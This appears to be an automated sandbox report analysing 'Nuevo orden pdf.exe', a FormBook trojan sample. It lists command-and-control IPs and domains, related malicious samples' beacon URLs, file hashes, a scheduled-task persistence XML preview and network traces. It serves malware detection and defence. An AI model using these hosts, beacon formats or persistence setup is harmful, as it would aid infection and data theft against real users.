E = explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp
S = Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp
B = Nuevo orden pdf.exe (binary)

The font-foundry URLs read from explorer.exe memory (fontbureau, sajatypeworks, sandoll, founder.com.cn and the like) are the kind of strings found in font-file metadata, not indicators of this sample; the trailing characters on several of them (bThe, coml, netD, DPlease) are string-carving artifacts.

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | E | false | - | high
http://www.fontbureau.com | E | false | - | high
http://www.fontbureau.com/designersG | E | false | - | high
http://www.fontbureau.com/designers/? | E | false | - | high
http://www.founder.com.cn/cn/bThe | E | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers? | E | false | - | high
http://www.tiro.com | E | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers | E | false | - | high
http://www.goodfont.co.kr | E | false | URL Reputation: safe (x3) | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | S | false | - | high
http://www.carterandcone.coml | E | false | URL Reputation: safe (x3) | unknown
http://www.sajatypeworks.com | E | false | URL Reputation: safe (x3) | unknown
http://www.typography.netD | E | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | E | false | - | high
http://www.founder.com.cn/cn/cThe | E | false | URL Reputation: safe (x3) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | E | false | URL Reputation: safe (x3) | unknown
http://fontfabrik.com | E | false | URL Reputation: safe (x3) | unknown
http://www.founder.com.cn/cn | E | false | URL Reputation: safe (x3) | unknown
http://vbcity.com/forums/t/51894.aspx | B | false | - | high
http://www.fontbureau.com/designers/frere-jones.html | E | false | - | high
http://www.jiyu-kobo.co.jp/ | E | false | URL Reputation: safe (x3) | unknown
http://www.galapagosdesign.com/DPlease | E | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers8 | E | false | - | high
http://www.fonts.com | E | false | - | high
http://www.sandoll.co.kr | E | false | URL Reputation: safe (x3) | unknown
http://www.urwpp.deDPlease | E | false | URL Reputation: safe (x3) | unknown
http://www.zhongyicts.com.cn | E | false | URL Reputation: safe (x3) | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | S | false | - | high
http://www.sakkal.com | E | false | URL Reputation: safe (x3) | unknown
https://github.com/MrCylops | B | false | - | high

                                                    Contacted IPs


                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
178.128.103.114 | thefuture101.com | Netherlands | 14061 | DIGITALOCEAN-ASN (US) | true
34.102.136.180 | bluevistainvestments.com | United States | 15169 | GOOGLE (US) | false
184.168.131.241 | mediatraining-toronto.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLC (US) | true

                                                    Private

                                                    IP
                                                    192.168.2.1

                                                    General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 404237
Start date: 04.05.2021
Start time: 20:31:14
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 45s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Nuevo orden pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@10/4@3/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 34.9% (good quality ratio 31.9%)
• Quality average: 71.7%
• Quality standard deviation: 31.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.88.21.125, 20.82.210.154, 104.43.193.48, 2.20.157.220, 104.42.151.234, 23.57.80.111, 20.82.209.183, 2.20.142.209, 2.20.142.210, 92.122.213.194, 92.122.213.247, 20.54.26.129
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/404237/sample/Nuevo orden pdf.exe

                                                    Simulations

                                                    Behavior and APIs

Time | Type | Description
20:32:08 | API Interceptor | 1x Sleep call for process: Nuevo orden pdf.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

Match: 184.168.131.241
Associated sample (detection): contacted URL
• g1EhgmCqCD.exe (malicious): www.palomachurch.com/8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P
• SWIFT 00395_IMG.exe (malicious): www.theboundless.life/bbqo/?Rb=M42dVLz8&XB64XbO8=5cE52+XUn5YOw4VrTBFj5Yjg6Bdl2wnKeIdlDky+FVUstW8yNKK8e4wg1M4nQ/djAnNx
• 4GGwmv0AJm.exe (malicious): www.politicalnobody.com/.q0os/?action=fbgen&v=110&crc=669
• don.exe (malicious): www.montcoimmigrationlawyer.com/uoe8/?Y4plXns=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&BR=cjlpd
• Comand#U0103 de achizi#U021bie PP050321.exe (malicious): www.shoprodeovegas.com/xcl/?DVodV=VtxhA2oX1n1prL&aRm4ZbJP=Q4feKhQOcUvJUP8oz4L5oOA8XtI+UFUMw1FgXJ9gQG3EsyP4HUo30rkjHaPboD73BEgI
• O1E623TjjW.exe (malicious): www.mojilifenoosa.com/uoe8/?hL3=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqidrZZ92WW4b0bAtNQ==&lN68=VTUTzPuXE25p9L
• product specification.xlsx (malicious): www.catherineandwilson.com/uoe8/?3fz=KdZiceDtrkPSh5wICXOYCMhbIwexAutPvfm5ku1h+ZdZhJi6amIzeeuRyyZPsh51ag6xYA==&-Z54yn=EN9puliPkdzp4
• 9DWvynenEDJ11fY.exe (malicious): www.presentationmagic.online/hsd/?QFQH4r=1bG8ElMXxJthtncP&qFN41JEh=gbeajf+ETOHEP0PZHUr0sH0pmTI6pJIXyLWb6Ib5oE0X8yNQm9fn6k4Inoesq/tjFe61
• PURCHASE ORDER.exe (malicious): www.xn--demirelik-u3a.com/u8nw/?pPB=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThFlMbwfIqHdYGe9kyQ==&Hpq=V6AHiBHXhz5LI4
• ETC-B72-LT-0149-03-AR.exe (malicious): www.shoprodeovegas.com/xcl/?0L0tLd=Q4feKhQOcUvJUP8oz4L5oOA8XtI+UFUMw1FgXJ9gQG3EsyP4HUo30rkjHaPboD73BEgI&jFNTjJ=aFNTkJDx
• 493bfe21_by_Libranalysis.exe (malicious): www.bodrope.com/8njn/?CTvX=cvRh_lYP&uFNl=Q5lxd4nOV6z6CcdYecjp1LutROUMPU3SQE6azJE1Czw7E14vrt/nRyUCs3zJRvNDQvTm
• krJF4BtzSv.exe (malicious): www.smarthealthubclub.com/oerg/?YL0=8pN4l4&r6A=9BaAtcK5xATnUYN0KSqZEziiqzIuiVppJqo/+bNoUNfJehdCQkqUVzs22u6IBE0AgZIm
• MRQUolkoK7.exe (malicious): www.ottawahomevalues.info/8u3b/?9rwxC4Lh=xUmcyzOk4AdBu/tilHHAKcZZd7JmKNqhEsoN8UKLLkcB2vFqOaieKULrS5S3/+NfkzmCUnU9lg==&o2=iN68aFPHs
• PO20210429.xlsx (malicious): www.abundando.com/8u3b/?Mz=ltx0qfi0x45&WBZXQ8j=VA7b8QnIVeQJLb4vJ/jdAFdrsC+XTLKBbUdPfJTqVxRnd+9E52kRPAdLCgwgRBmqlhQAqg==
• z5Wqivscwd.exe (malicious): www.essential.care/f0sg/?9rQPJl=g9LzgpKuBvImk0kG+GJMLFKZevb+pnBUPQILZLjjt7sgNrDsNlImg91PoYPi1VOUwj/O&EzrtFB=4hL05l3xNH1L
• DHL_S390201.exe (malicious): www.thevandolly.com/u2gd/?Rnm=XPc43lnxP&IDKPY0x=9TQa0wIlBYwfJDwG2Z9hvZYJBv0iycAFxoKvqpGfSPWIdmtTiS4MQ+I/8YKrwePIIqW4
• SWIFT COPY.exe (malicious): www.brad-caroline.com/gnf/?LZhxv=apOpNte8alFpO6vP&7nE4Zlw=g15J7GGOuse5iUv+r/h5g/mBWked130OqUrJnFmD3Jgb0UMGkh9+WkxhJWheCXb3PGqf
• AL-IEDAHINV.No09876543.exe (malicious): www.ssssummit.com/uv34/?gjKTUx=6lchmDL0&rnKTobm=WMQTG0rumw6bKas1ntyyM+QsxkhHxu1ZUcBmNY6ij7cyCWSVhqmkPYQs9C/7EVYcnBE0
• letterhead.exe (malicious): www.accidentattorneynearme.net/epms/?x4uDfZgH=njiKImUeNemx2H2C1bki9Spb1pz8bRxtrDi2F8yKp6wD2n21irAidQ0QvvZYOXwohy7E&Cj30v=9rJhur7HoF7lOxC
• Updated April SOA.xlsx (malicious): www.bookbeachchairs.com/hx3a/?BDH=EBC1Cs7p3SY2xjAhEgLKPc+2rIVZ9PU/AWUwkk97HGSV6MybJ9/jFRm9oMKT03OILBUCjg==&SH6=u2JtglFH

                                                    Domains

No entries.

                                                    ASN

Match: AS-26496-GO-DADDY-COM-LLC (US)
Associated sample (detection): contacted IP
• g1EhgmCqCD.exe (malicious): 184.168.131.241
• TT.exe (malicious): 107.180.41.236
• SWIFT 00395_IMG.exe (malicious): 184.168.131.241
• 4GGwmv0AJm.exe (malicious): 50.62.168.157
• c647b2da_by_Libranalysis.exe (malicious): 184.168.131.241
• HAWB AND INV.exe (malicious): 107.180.57.119
• Inquiry 05042021.doc (malicious): 107.180.43.16
• don.exe (malicious): 184.168.131.241
• Comand#U0103 de achizi#U021bie PP050321.exe (malicious): 184.168.131.241
• O1E623TjjW.exe (malicious): 184.168.131.241
• product specification.xlsx (malicious): 184.168.131.241
• 9DWvynenEDJ11fY.exe (malicious): 184.168.131.241
• PURCHASE ORDER.exe (malicious): 184.168.131.241
• ETC-B72-LT-0149-03-AR.exe (malicious): 184.168.131.241
• SecuriteInfo.com.Heur.3869.xls (malicious): 192.186.217.35
• SecuriteInfo.com.Heur.3869.xls (malicious): 192.186.217.35
• SecuriteInfo.com.Heur.12433.xls (malicious): 192.186.217.35
• SecuriteInfo.com.Heur.12433.xls (malicious): 192.186.217.35
• Documents_1906038956_974385067.xls (malicious): 192.186.217.35
• Documents_1906038956_974385067.xls (malicious): 192.186.217.35

Match: DIGITALOCEAN-ASN (US)
Associated sample (detection): contacted IP
• 08917506_by_Libranalysis.exe (malicious): 206.189.46.186
• fbca5ac9_by_Libranalysis.dll (malicious): 159.203.93.122
• fbca5ac9_by_Libranalysis.dll (malicious): 159.203.93.122
• 1a92153c_by_Libranalysis.dll (malicious): 159.203.93.122
• 1a92153c_by_Libranalysis.dll (malicious): 159.203.93.122
• e577256b_by_Libranalysis.dll (malicious): 159.203.93.122
• e577256b_by_Libranalysis.dll (malicious): 159.203.93.122
• 2f50000.exe (malicious): 46.101.183.160
• 4d8c102b_by_Libranalysis.dll (malicious): 159.203.93.122
• 4d8c102b_by_Libranalysis.dll (malicious): 159.203.93.122
• 28e19445_by_Libranalysis.dll (malicious): 159.203.93.122
• 28e19445_by_Libranalysis.dll (malicious): 159.203.93.122
• ad2cc5c6_by_Libranalysis.dll (malicious): 159.203.93.122
• ad2cc5c6_by_Libranalysis.dll (malicious): 159.203.93.122
• 2dc106fa_by_Libranalysis.dll (malicious)
                                                    • 159.203.93.122
                                                    12216ea2_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    12216ea2_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    70e645c6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    70e645c6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    bba0c41e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo orden pdf.exe.log
                                                    Process:C:\Users\user\Desktop\Nuevo orden pdf.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):1314
                                                    Entropy (8bit):5.350128552078965
                                                    Encrypted:false
                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                    C:\Users\user\AppData\Local\Temp\tmpA401.tmp
                                                    Process:C:\Users\user\Desktop\Nuevo orden pdf.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1644
                                                    Entropy (8bit):5.19338596048242
                                                    Encrypted:false
                                                    SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB/tn:cbh47TlNQ//rydbz9I3YODOLNdq3D
                                                    MD5:E61B1F1504FEE0014F276BA4BEDCBAEF
                                                    SHA1:1DE67195E7B49B35F4D287417A63C092E2633E14
                                                    SHA-256:82CB1C94A5AAB94F0C51581E1439829D277617146448553E9B23A736A2D7BD73
                                                    SHA-512:5EB642BDC9EE7211947C2CB80CE4053B7590424E0FC0956AD26FF072ED2D9B934A0B2A1587D862AB92C17C4A9871F5456C39673A46281D668A4591B4542C220F
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                    C:\Users\user\AppData\Roaming\NkwKQPLeekw.exe
                                                    Process:C:\Users\user\Desktop\Nuevo orden pdf.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):907776
                                                    Entropy (8bit):7.652560267599121
                                                    Encrypted:false
                                                    SSDEEP:12288:hjGTBHP8LKMTnc2NOAbLWVUuxM5XQTOUZ9V6EnReYLuIsguNA4D6VvxErz2cqPSs:hjy9xkXB09V6EnRhxODMvmXsDds
                                                    MD5:02A32CC05EFBF5236A8C0928D3C9170E
                                                    SHA1:FA3A639F15116DA149B14D832B9255528F0BFE65
                                                    SHA-256:5930CFA7DD5664E104C299FCE83451021349922B6B02774235EAE6BD14FAD464
                                                    SHA-512:22C8BA32AF4A695410652D2D6FCBF79E1804EB9FFD4328F5377E20485052366F53467FC6691070787AE750D8C5B8304E446DF803B0375CA45268BC1E264F26EA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Reputation:low
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.................P.............n.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................P.......H...........\............................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....oU...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                                    C:\Users\user\AppData\Roaming\NkwKQPLeekw.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\Nuevo orden pdf.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview: [ZoneTransfer]....ZoneId=0

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.652560267599121
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:Nuevo orden pdf.exe
                                                    File size:907776
                                                    MD5:02a32cc05efbf5236a8c0928d3c9170e
                                                    SHA1:fa3a639f15116da149b14d832b9255528f0bfe65
                                                    SHA256:5930cfa7dd5664e104c299fce83451021349922b6b02774235eae6bd14fad464
                                                    SHA512:22c8ba32af4a695410652d2d6fcbf79e1804eb9ffd4328f5377e20485052366f53467fc6691070787ae750d8c5b8304e446df803b0375ca45268bc1e264f26ea
                                                    SSDEEP:12288:hjGTBHP8LKMTnc2NOAbLWVUuxM5XQTOUZ9V6EnReYLuIsguNA4D6VvxErz2cqPSs:hjy9xkXB09V6EnRhxODMvmXsDds
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.................P.............n.... ........@.. .......................@............@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4def6e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0xEAA2096F [Tue Sep 28 04:49:51 2094 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al   (repeated 97 times: the bytes after the CLR stub jump are zero padding, and 00 00 disassembles as add byte ptr [eax], al)

                                                    Data Directories

                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdef1c | 0x4f | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe0000 | 0x5b4 | .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe2000 | 0xc | .reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0xdef00 | 0x1c | .text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                    Sections

                                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                    .text | 0x2000 | 0xdcf74 | 0xdd000 | False | 0.846478630515 | data | 7.65919160699 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc | 0xe0000 | 0x5b4 | 0x600 | False | 0.421223958333 | data | 4.08739735314 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc | 0xe2000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    Name | RVA | Size | Type | Language | Country
                                                    RT_VERSION | 0xe0090 | 0x324 | data | |
                                                    RT_MANIFEST | 0xe03c4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                    Imports

                                                    DLL | Import
                                                    mscoree.dll | _CorExeMain

                                                    Version Infos

                                                    Description | Data
                                                    Translation | 0x0000 0x04b0
                                                    LegalCopyright | Copyright 2019
                                                    Assembly Version | 1.0.0.0
                                                    InternalName | Size.exe
                                                    FileVersion | 1.0.0.0
                                                    CompanyName |
                                                    LegalTrademarks |
                                                    Comments |
                                                    ProductName | StarEggControl
                                                    ProductVersion | 1.0.0.0
                                                    FileDescription | StarEggControl
                                                    OriginalFilename | Size.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                    05/04/21-20:33:17.211909 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49728 | 80 | 192.168.2.3 | 178.128.103.114
                                                    05/04/21-20:33:17.211909 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49728 | 80 | 192.168.2.3 | 178.128.103.114
                                                    05/04/21-20:33:17.211909 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49728 | 80 | 192.168.2.3 | 178.128.103.114
                                                    05/04/21-20:33:56.613141 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.3 | 34.102.136.180
                                                    05/04/21-20:33:56.613141 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.3 | 34.102.136.180
                                                    05/04/21-20:33:56.613141 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.3 | 34.102.136.180
                                                    05/04/21-20:33:56.750116 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49736 | 34.102.136.180 | 192.168.2.3

                                                    Network Port Distribution

                                                    TCP Packets

                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    May 4, 2021 20:33:16.916558027 CEST | 49728 | 80 | 192.168.2.3 | 178.128.103.114
                                                    May 4, 2021 20:33:17.211694956 CEST | 80 | 49728 | 178.128.103.114 | 192.168.2.3
                                                    May 4, 2021 20:33:17.211803913 CEST | 49728 | 80 | 192.168.2.3 | 178.128.103.114
                                                    May 4, 2021 20:33:17.211909056 CEST | 49728 | 80 | 192.168.2.3 | 178.128.103.114
                                                    May 4, 2021 20:33:17.506753922 CEST | 80 | 49728 | 178.128.103.114 | 192.168.2.3
                                                    May 4, 2021 20:33:17.513118982 CEST | 80 | 49728 | 178.128.103.114 | 192.168.2.3
                                                    May 4, 2021 20:33:17.513158083 CEST | 80 | 49728 | 178.128.103.114 | 192.168.2.3
                                                    May 4, 2021 20:33:17.513268948 CEST | 49728 | 80 | 192.168.2.3 | 178.128.103.114
                                                    May 4, 2021 20:33:17.513339043 CEST | 49728 | 80 | 192.168.2.3 | 178.128.103.114
                                                    May 4, 2021 20:33:17.809281111 CEST | 80 | 49728 | 178.128.103.114 | 192.168.2.3
                                                    May 4, 2021 20:33:35.782933950 CEST | 49735 | 80 | 192.168.2.3 | 184.168.131.241
                                                    May 4, 2021 20:33:35.976645947 CEST | 80 | 49735 | 184.168.131.241 | 192.168.2.3
                                                    May 4, 2021 20:33:35.976763964 CEST | 49735 | 80 | 192.168.2.3 | 184.168.131.241
                                                    May 4, 2021 20:33:35.976903915 CEST | 49735 | 80 | 192.168.2.3 | 184.168.131.241
                                                    May 4, 2021 20:33:36.169887066 CEST | 80 | 49735 | 184.168.131.241 | 192.168.2.3
                                                    May 4, 2021 20:33:36.241235971 CEST | 80 | 49735 | 184.168.131.241 | 192.168.2.3
                                                    May 4, 2021 20:33:36.241264105 CEST | 80 | 49735 | 184.168.131.241 | 192.168.2.3
                                                    May 4, 2021 20:33:36.241421938 CEST | 49735 | 80 | 192.168.2.3 | 184.168.131.241
                                                    May 4, 2021 20:33:36.241481066 CEST | 49735 | 80 | 192.168.2.3 | 184.168.131.241
                                                    May 4, 2021 20:33:36.434458971 CEST | 80 | 49735 | 184.168.131.241 | 192.168.2.3
                                                    May 4, 2021 20:33:56.571717024 CEST | 49736 | 80 | 192.168.2.3 | 34.102.136.180
